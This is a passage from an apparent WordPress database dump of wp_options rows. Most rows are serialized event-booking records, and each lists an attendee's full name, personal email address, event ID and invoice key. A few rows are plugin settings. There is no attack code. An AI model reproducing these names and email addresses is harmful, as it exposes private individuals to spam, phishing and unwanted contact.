Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6113374,'ihaf_admin_notices','a:1:{s:14:\"review_request\";a:2:{s:4:\"time\";i:1652670624;s:9:\"dismissed\";b:1;}}','yes'),(6113375,'ihaf_activated','a:3:{s:4:\"lite\";i:1652020843;s:6:\"wpcode\";i:1658860320;s:7:\"version\";s:5:\"2.1.5\";}','yes'),(6113646,'UGK94037','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:16:\"Marc Massengale \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266660;s:11:\"invoice_key\";s:32:\"09ee0b8cf7be398ccfeb9eac06d38d47\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:16:\"Marc Massengale \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6113749,'NZC30524','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:29:\"jackiedianeroberts@icloud.com\";s:4:\"name\";s:24:\"Jacqueline Diane Roberts\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266661;s:11:\"invoice_key\";s:32:\"72cabcefeaeb81974e1dafd326f29159\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:29:\"jackiedianeroberts@icloud.com\";s:4:\"name\";s:24:\"Jacqueline Diane Roberts\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6113927,'EWV99156','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnzies3@gmail.com\";s:4:\"name\";s:7:\"Lynnzie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266662;s:11:\"invoice_key\";s:32:\"bb1418775ba9d1fb8d97baaccf367a28\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnzies3@gmail.com\";s:4:\"name\";s:7:\"Lynnzie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6113984,'HFX86700','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"uchenwamoh@yahoo.com\";s:4:\"name\";s:4:\"Uche\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266663;s:11:\"invoice_key\";s:32:\"bf992333c0eb9b820107d67ae40a1008\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"uchenwamoh@yahoo.com\";s:4:\"name\";s:4:\"Uche\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6114084,'EWU87439','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"sue2earth@msn.com\";s:4:\"name\";s:10:\"Sue Haebig\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266664;s:11:\"invoice_key\";s:32:\"5dcc051f7d18622e16524387528d1c93\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"sue2earth@msn.com\";s:4:\"name\";s:10:\"Sue Haebig\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6114088,'VFB37200','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sewgoodseed@gmail.com\";s:4:\"name\";s:8:\"Michele \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266665;s:11:\"invoice_key\";s:32:\"b4a28d825c1ba03ad932ac35820d38d3\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sewgoodseed@gmail.com\";s:4:\"name\";s:8:\"Michele \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6114100,'BDC98943','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sewgoodseed@gmail.com\";s:4:\"name\";s:8:\"Michele \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266666;s:11:\"invoice_key\";s:32:\"1085aae6a12234a1ce15f813d04f71be\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:21:\"sewgoodseed@gmail.com\";s:4:\"name\";s:8:\"Michele \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6114134,'FBM20391','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266667;s:11:\"invoice_key\";s:32:\"664348b9b6118965cf809db0fbab0540\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn Gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6114196,'JHY63353','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"acongem@gmail.com\";s:4:\"name\";s:21:\"Tony Olih Nwaokolobia\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266669;s:11:\"invoice_key\";s:32:\"4204d10eda22755541102a21bced65ab\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:17:\"acongem@gmail.com\";s:4:\"name\";s:21:\"Tony Olih Nwaokolobia\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6114203,'YWK45796','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652005800:1652052600\";s:8:\"event_id\";s:6:\"266568\";s:19:\"translated_event_id\";s:6:\"266568\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266670;s:11:\"invoice_key\";s:32:\"041224b2a1c791a4555d8d73f8269756\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:11:\"kery colvin\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6114575,'GDA52192','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652615100:1652619600\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266673;s:11:\"invoice_key\";s:32:\"80b0c51413666d532504f2acdf89d6e1\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6114606,'PNE35451','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652814000:1652817600\";s:8:\"event_id\";s:6:\"266611\";s:19:\"translated_event_id\";s:6:\"266611\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266674;s:11:\"invoice_key\";s:32:\"befe520f6761be7d295e80574f6b152b\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6138313,'JPU32767','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"elizabethstar1@yahoo.com\";s:4:\"name\";s:17:\"Elizabeth Brandes\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652615100:1652619600\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266683;s:11:\"invoice_key\";s:32:\"7f7ac9baaacec59151703ef86552118e\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"elizabethstar1@yahoo.com\";s:4:\"name\";s:17:\"Elizabeth Brandes\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6150723,'CER60581','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1652814000:1652817600\";s:8:\"event_id\";s:6:\"266611\";s:19:\"translated_event_id\";s:6:\"266611\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266686;s:11:\"invoice_key\";s:32:\"9ce1f4f3a272000d0df131b91c1bc19e\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6173092,'QLR29831','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"blueseausa@yahoo.com\";s:4:\"name\";s:9:\"Iyke Uche\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655639100:1655643600\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266691;s:11:\"invoice_key\";s:32:\"d8038e764a246842d21d33d8cfecc497\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"blueseausa@yahoo.com\";s:4:\"name\";s:9:\"Iyke Uche\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6176994,'wp_maintenance_mode_install','1653339387','yes'),(6183012,'simplehistory_AvailableUpdatesLogger_wp_core_version_available','6.4.1','yes'),(6183461,'simplehistory_AvailableUpdatesLogger_theme_updates_available','a:2:{s:15:\"twentytwentytwo\";a:1:{s:15:\"checked_version\";s:3:\"1.4\";}s:17:\"twentytwentythree\";a:1:{s:15:\"checked_version\";s:3:\"1.3\";}}','yes'),(6184227,'PBG26291','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:15:\"crushold@me.com\";s:4:\"name\";s:13:\"Candy Rushold\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655838000:1655841600\";s:8:\"event_id\";s:6:\"266611\";s:19:\"translated_event_id\";s:6:\"266611\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266711;s:11:\"invoice_key\";s:32:\"d4b251c4bf7827601fe2617a805b2897\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:15:\"crushold@me.com\";s:4:\"name\";s:13:\"Candy Rushold\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6198052,'user_count','3','no'),(6215003,'ZEO50148','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"264haddenh@gmail.com\";s:4:\"name\";s:15:\"Diane Haddenham\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266740;s:11:\"invoice_key\";s:32:\"24182b8d38536cae3f2050d19fd82990\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"264haddenh@gmail.com\";s:4:\"name\";s:15:\"Diane Haddenham\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6224535,'themeisle_sdk_notifications','a:2:{s:17:\"last_notification\";a:2:{s:2:\"id\";s:31:\"wp_maintenance_mode_logger_flag\";s:10:\"display_at\";i:1654485025;}s:24:\"last_notification_active\";i:1654485423;}','yes'),(6224562,'rsssl_activated_plugin','1','yes'),(6224578,'wp_maintenance_mode_review_flag','no','yes'),(6224579,'https_migration_required','','yes'),(6236893,'JND22470','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:14:\"Joanne Milelli\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266763;s:11:\"invoice_key\";s:32:\"6f318fe7a17f16aabad956611b4d077a\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:14:\"Joanne Milelli\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6250132,'wp_maintenance_mode_logger_flag','no','yes'),(6255558,'KBC10697','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnzies3@gmail.com\";s:4:\"name\";s:7:\"Lynnzie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266768;s:11:\"invoice_key\";s:32:\"12576a602f93c242b2ed06adc0ff67e2\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"lynnzies3@gmail.com\";s:4:\"name\";s:7:\"Lynnzie\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6257455,'HRV31118','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:9:\"Christest\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1809858600:1809905400\";s:8:\"event_id\";s:6:\"266540\";s:19:\"translated_event_id\";s:6:\"266540\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266770;s:11:\"invoice_key\";s:32:\"c2cb605370a46ff24e29dc9df8b8ec8f\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:9:\"Christest\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6271817,'wp-optimize-webp_converters','a:3:{i:0;s:11:\"imagemagick\";i:1;s:7:\"imagick\";i:2;s:2:\"gd\";}','yes'),(6271818,'wp-optimize-rewrite_status','false','yes'),(6276437,'QXR88867','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:14:\"Joanne Milelli\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655029800:1655076600\";s:8:\"event_id\";s:6:\"266715\";s:19:\"translated_event_id\";s:6:\"266715\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266778;s:11:\"invoice_key\";s:32:\"70a000f3bf258051878f71206f1c4923\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:14:\"Joanne 